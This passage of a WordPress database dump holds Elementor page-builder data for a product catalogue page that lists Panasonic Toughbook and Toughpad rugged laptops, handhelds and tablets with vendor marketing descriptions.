]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3418,2627,'_elementor_edit_mode','builder'),(3648,2678,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3409,2619,'_wp_page_template','template-fullwidth.php'),(3410,2619,'_hide_page_title',''),(3411,2619,'_hide_header',''),(3412,2619,'_hide_footer',''),(3413,2619,'_hide_breadcrumb',''),(3414,2619,'_cover',''),(3415,2619,'_show_excerpt',''),(3416,2619,'_wc_apply_product',''),(3417,2619,'_yoast_wpseo_content_score','90'),(3422,2627,'_elementor_version','0.4'),(3645,2678,'_elementor_edit_mode','builder'),(3646,2678,'_elementor_template_type','post'),(3647,2678,'_wp_page_template','template-fullwidth.php'),(3425,2628,'_elementor_edit_mode','builder'),(3426,2628,'_elementor_template_type','post'),(3427,2628,'_wp_page_template','template-fullwidth.php'),(3428,2628,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop 